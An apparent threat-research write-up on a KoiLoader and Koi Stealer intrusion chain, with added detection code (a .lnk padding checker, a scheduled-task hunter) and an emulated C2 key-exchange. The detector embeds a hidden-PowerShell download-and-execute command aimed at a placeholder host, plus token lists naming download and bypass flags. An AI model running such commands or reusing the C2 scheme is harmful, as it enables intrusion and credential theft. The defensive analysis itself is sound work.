eSentire's Threat Response Unit (TRU) has detected an intrusion attempt involving a new version of KoiLoader, a malware loader used to facilitate Command and Control (C&C) and deploy Koi Stealer, an information stealer.
The attack begins with a phishing email carrying a ZIP attachment titled chase_statement_march.zip. Inside: a deceptive .lnk file masquerading as a legitimate document. "The shortcut file makes use of a well-known, low-severity bug in Windows to effectively conceal the command line arguments when viewing the file's properties," TRU explains in its detailed report.
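The page does not say which Windows quirk the shortcut abuses. The check below is an added example (not eSentire/TRU code) and assumes the widely reported variant: the COMMAND_LINE_ARGUMENTS string is padded with whitespace so the Properties dialog shows a blank or truncated target while the real PowerShell launcher sits past what is displayed. It parses the MS-SHLLINK StringData section directly, builds a constructed sample shortcut in memory so it runs offline, and flags padding, over-long arguments and hidden-window PowerShell tokens. The 260-character visible limit, the whitespace threshold, the PowerShell token list and the example.invalid host are assumptions, not values from the report.

```python
import struct

# Added example (not eSentire/TRU code). Parses the StringData section of a
# Windows Shell Link (.lnk) per MS-SHLLINK and flags the argument-hiding
# trick: COMMAND_LINE_ARGUMENTS padded with whitespace past what the
# shortcut Properties dialog displays.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80

# Assumed thresholds: the Properties "Target" box shows roughly the first
# 260 characters, and benign shortcuts never lead with a long whitespace run.
VISIBLE_LIMIT = 260
PAD_RUN_LIMIT = 16
# Assumed indicator tokens for a hidden or downloading PowerShell launcher.
PS_TOKENS = ("-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand",
             "downloadstring", "iwr ", "invoke-webrequest", "iex")


def build_lnk(arguments: str) -> bytes:
    """Build a minimal Unicode .lnk that carries only COMMAND_LINE_ARGUMENTS."""
    header = bytearray(76)                        # ShellLinkHeader is 0x4C bytes
    struct.pack_into("<I", header, 0, 76)         # HeaderSize
    header[4:20] = LNK_CLSID                      # LinkCLSID
    struct.pack_into("<I", header, 20, HAS_ARGS | IS_UNICODE)   # LinkFlags
    return bytes(header) + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields: name, relative_path, working_dir, arguments, icon_location."""
    if struct.unpack_from("<I", data, 0)[0] != 76 or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_IDLIST:                        # LinkTargetIDList: u16 size + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                      # LinkInfo: u32 total size, self-inclusive
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                      (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
    return fields


def assess_lnk(data: bytes) -> dict:
    """Flag shortcuts whose arguments are hidden from the Properties view."""
    args = parse_lnk(data).get("arguments", "")
    real = args.lstrip()
    pad = len(args) - len(real)
    reasons = []
    if pad >= PAD_RUN_LIMIT:
        reasons.append(f"{pad} leading whitespace chars hide the real command")
    if len(args) > VISIBLE_LIMIT:
        reasons.append(f"arguments are {len(args)} chars, beyond the {VISIBLE_LIMIT}-char view")
    low = real.lower()
    if "powershell" in low and any(t in low for t in PS_TOKENS):
        reasons.append("hidden or downloading PowerShell launcher")
    return {"arguments": real, "hidden_padding": pad,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed samples (not artifacts from the campaign): a padded malicious
# shortcut and a benign one. The host name is a placeholder.
SAMPLE_CMD = ('powershell.exe -w hidden -c "iwr https://example.invalid/a.js '
              '-OutFile $env:TEMP\\a.js; wscript $env:TEMP\\a.js"')
PADDED_LNK = build_lnk(" " * 300 + SAMPLE_CMD)
BENIGN_LNK = build_lnk("/open report.docx")

if __name__ == "__main__":
    for label, blob in (("padded", PADDED_LNK), ("benign", BENIGN_LNK)):
        print(label, assess_lnk(blob))
```

Run it over `open(path, "rb").read()` for a real attachment; anything with a non-zero `hidden_padding` is worth a second look even if the visible target looks like a document.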
Clicking it triggers a hidden PowerShell command that downloads two malicious JScript files: g1siy9wuiiyxnk.js and i7z1x5npc.js. These scripts:
- Establish scheduled tasks using schtasks.exe
- Swap execution contexts to create the illusion of system-trusted processes
- Download further payloads from compromised websites

"This technique is being used to evade detection, as the parent process of wscript.exe appears to be svchost.exe… giving the impression that WScript was launched by a more trustworthy parent process."
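A task started by the Task Scheduler service is spawned by the svchost.exe that hosts that service, which is exactly the trusted-looking parent the quote above describes. One way to hunt for this on a fleet is to collect `schtasks /query /v /fo CSV` from each host and score the rows. The block below is an added example (not eSentire/TRU code): it flags tasks that run a script host from a user-writable path, pass hidden-window or policy-bypass switches, or carry a GUID-named task or script, the naming pattern the report attributes to KoiLoader's persistence task. The CSV rows, host names, paths and GUID are constructed for the demo, and the indicator lists are assumptions to tune per environment.

```python
import csv
import io
import re

# Added example (not eSentire/TRU code). Hunts scheduled tasks that launch a
# script host from a user-writable path, use hidden/bypass flags, or carry a
# GUID-named task or script. Input is the CSV that `schtasks /query /v /fo CSV`
# prints; only the TaskName, Author and "Task To Run" columns are used.
GUID_RE = re.compile(r"\{?[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}\}?")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe")
# Assumed indicator lists; tune to the environment.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\",
                 "%temp%", "%appdata%", "%localappdata%")
HIDDEN_FLAGS = (" //b", "-w hidden", "-windowstyle hidden", "-ep bypass",
                "-executionpolicy bypass", "-encodedcommand", " -enc ")


def hunt_scheduled_tasks(csv_text: str) -> list:
    """Return one finding per suspicious task, in input order."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row.get("TaskName", "")
        if name == "TaskName":           # verbose output repeats the header per folder
            continue
        action = row.get("Task To Run", "")
        low = action.lower()
        reasons = []
        if GUID_RE.search(name) or GUID_RE.search(action):
            reasons.append("GUID-named task or script")
        if any(low.startswith(h) or "\\" + h in low for h in SCRIPT_HOSTS):
            if any(d in low for d in USER_WRITABLE):
                reasons.append("script host launched from a user-writable path")
            if any(f in low for f in HIDDEN_FLAGS):
                reasons.append("hidden-window or policy-bypass flags")
        if reasons:
            findings.append({"task": name, "action": action,
                             "author": row.get("Author", ""), "reasons": reasons})
    return findings


# Constructed sample output (host name, paths and the GUID are made up; real
# `schtasks /query /v /fo CSV` output has many more columns).
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Status","Author","Task To Run","Run As User","Schedule Type"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM","Multiple schedule types"
"WS01","\OneDrive Standalone Update Task","Ready","Microsoft Corporation","C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe","WS01\alice","Daily"
"WS01","\SystemUpdate","Ready","WS01\alice","wscript.exe //B C:\Users\alice\AppData\Roaming\6f1c2b3a-9d4e-4f0a-8b1c-2d3e4f5a6b7c.js","WS01\alice","At logon"
"WS01","\Updater","Ready","WS01\alice","powershell.exe -w hidden -ep bypass -f C:\Users\Public\u.ps1","WS01\alice","Minute"
'''

if __name__ == "__main__":
    for f in hunt_scheduled_tasks(SAMPLE_SCHTASKS_CSV):
        print(f["task"], "->", ", ".join(f["reasons"]))
```

The OneDrive row is there on purpose: an updater executable living under AppData is normal, so the user-writable-path rule only fires when the action is a script host, which keeps the common false positive out while still catching the wscript.exe and PowerShell launchers.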
The second script (i7z1x5npc.js) acts as the infection's engine room:
- Retrieves system info (GUID)
- Creates a unique file path for persistence
- Downloads two PowerShell scripts from casettalecese[.]it
- Uses Invoke-WebRequest and Invoke-Expression to run them

The first script disables the Anti-Malware Scan Interface (AMSI); the second loads the KoiLoader binary into memory using shellcode and CreateThread.
Once unpacked, KoiLoader's second stage checks for:
- Language settings (bails on Russian, Belarusian, Kazakh, etc.)
- VM artifacts like VirtualBox files and display drivers
- Sandbox telltales like dummy Word docs and research environment usernames (e.g., "WDAGUtilityAccount", "Joe Cage", or "Harry Johnson")
- System specs (e.g., RAM ≥ 3 GB, running under PowerShell)

KoiLoader gains persistence by:
- Abusing ICMLuaUtil for a UAC bypass to exclude itself from Defender scanning
- Creating a scheduled task tied to a script named after the machine's GUID
- Creating a custom mutex based on the volume serial number to prevent duplicate execution

Finally, KoiLoader uses PowerShell to download and execute sd4.ps1 or sd2.ps1, both of which:
- Download the KoiStealer malware
- Execute it via PowerShell
- Begin systematic data theft

KoiStealer is built to extract:
- Saved passwords
- System credentials
- Session cookies
- Browser and application data

KoiLoader uses a custom HTTP-based Command and Control (C2) protocol:
- Registers the infected host with a GUID, build ID, and X25519 public key
- Sends encrypted system info using a derived shared secret
- Enters a loop to poll for commands, one per second

Command options include:
- Running shell or PowerShell commands
- Injecting payloads into explorer.exe or certutil.exe
- Performing shutdowns
- Creating scheduled tasks
- Loading DLLs dynamically

TRU has released a Python-based emulation toolkit for researchers to simulate C2 traffic.
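To make the registration handshake concrete, here is an added example of the pattern the report describes: the host presents a GUID, build ID and X25519 public key, both sides derive a shared secret, and the host then sends encrypted system information. This is not KoiLoader's wire protocol and not TRU's emulation toolkit; the page does not give the KDF, the cipher, the message framing, or whether the server answers with its own public key, so all of those are assumptions here (SHA-256 KDF, an HMAC-SHA256 keystream with an encrypt-then-MAC tag, JSON bodies standing in for the HTTP requests and responses). X25519 is implemented from RFC 7748 so the block runs with the standard library alone; use a vetted library for anything beyond a demonstration.

```python
import hashlib
import hmac
import json
import os

# Added example (not KoiLoader's protocol, not TRU's toolkit). Models the
# registration the report describes: GUID + build ID + X25519 public key,
# a derived shared secret, then encrypted system info. KDF, cipher, JSON
# framing and the server's public-key reply are assumptions.
P = 2**255 - 19
A24 = 121665
BASEPOINT = (9).to_bytes(32, "little")


def x25519(k: bytes, u: bytes) -> bytes:
    """Montgomery ladder from RFC 7748 section 5: scalar k times point u."""
    kb = bytearray(k)
    kb[0] &= 248
    kb[31] = (kb[31] & 127) | 64                 # clamp the scalar
    k = int.from_bytes(kb, "little")
    ub = bytearray(u)
    ub[31] &= 127                                # mask the unused top bit
    x1 = int.from_bytes(ub, "little") % P
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) * (da + cb) % P
        z3 = x1 * ((da - cb) * (da - cb) % P) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def x25519_public(priv: bytes) -> bytes:
    return x25519(priv, BASEPOINT)


def derive_key(shared: bytes, client_pub: bytes, server_pub: bytes) -> bytes:
    # Assumed KDF: hash the raw shared secret together with both public keys.
    return hashlib.sha256(b"demo-c2-kdf" + shared + client_pub + server_pub).digest()


def seal(key: bytes, nonce: bytes, plaintext: bytes):
    # Assumed cipher: HMAC-SHA256 counter keystream XOR, then encrypt-then-MAC tag.
    out = bytearray()
    for i in range(0, len(plaintext), 32):
        block = hmac.new(key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
        out += bytes(p ^ s for p, s in zip(plaintext[i:i + 32], block))
    tag = hmac.new(key, nonce + bytes(out), hashlib.sha256).digest()
    return bytes(out), tag


def unseal(key: bytes, nonce: bytes, ciphertext: bytes, tag: bytes) -> bytes:
    expect = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(expect, tag):
        raise ValueError("bad tag")
    return seal(key, nonce, ciphertext)[0]       # XOR keystream is symmetric


def client_register(client_priv: bytes, guid: str, build_id: str) -> dict:
    """Registration body: GUID, build ID and the host's X25519 public key."""
    return {"guid": guid, "build": build_id, "pubkey": x25519_public(client_priv).hex()}


def server_handle_register(server_priv: bytes, reg: dict):
    """Server side: derive the session key and reply with its own public key."""
    client_pub = bytes.fromhex(reg["pubkey"])
    server_pub = x25519_public(server_priv)
    key = derive_key(x25519(server_priv, client_pub), client_pub, server_pub)
    return {"pubkey": server_pub.hex()}, key


def client_finish(client_priv: bytes, reply: dict) -> bytes:
    server_pub = bytes.fromhex(reply["pubkey"])
    return derive_key(x25519(client_priv, server_pub), x25519_public(client_priv), server_pub)


def client_send_sysinfo(key: bytes, sysinfo: dict) -> dict:
    nonce = os.urandom(16)
    ct, tag = seal(key, nonce, json.dumps(sysinfo, sort_keys=True).encode())
    return {"nonce": nonce.hex(), "data": ct.hex(), "tag": tag.hex()}


def server_read_sysinfo(key: bytes, msg: dict) -> dict:
    pt = unseal(key, bytes.fromhex(msg["nonce"]), bytes.fromhex(msg["data"]), bytes.fromhex(msg["tag"]))
    return json.loads(pt)


def run_exchange(client_priv: bytes, server_priv: bytes) -> bool:
    """Full registration round trip; True when the server recovers the sysinfo."""
    sysinfo = {"os": "Windows 10", "user": "alice", "ram_gb": 8}      # constructed
    reg = client_register(client_priv, "6f1c2b3a-9d4e-4f0a-8b1c-2d3e4f5a6b7c", "demo-build")
    reply, server_key = server_handle_register(server_priv, reg)
    client_key = client_finish(client_priv, reply)
    echoed = server_read_sysinfo(server_key, client_send_sysinfo(client_key, sysinfo))
    return client_key == server_key and echoed == sysinfo


if __name__ == "__main__":
    print(run_exchange(os.urandom(32), os.urandom(32)))
```

After this exchange the implant would enter its one-second polling loop using the same session key; an emulator like TRU's toolkit only needs the server half above plus a command queue to exercise that loop. Binding both public keys into the KDF is what stops a mismatched or replayed registration from yielding the same key on both sides, and the tag check in `unseal` is what turns a garbled or tampered body into a hard failure rather than silently decoded noise.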
The 2025 variant of KoiLoader is a polished piece of malware engineering, blending social engineering, multi-layered scripting, anti-analysis techniques, and a custom cryptographic C2 channel.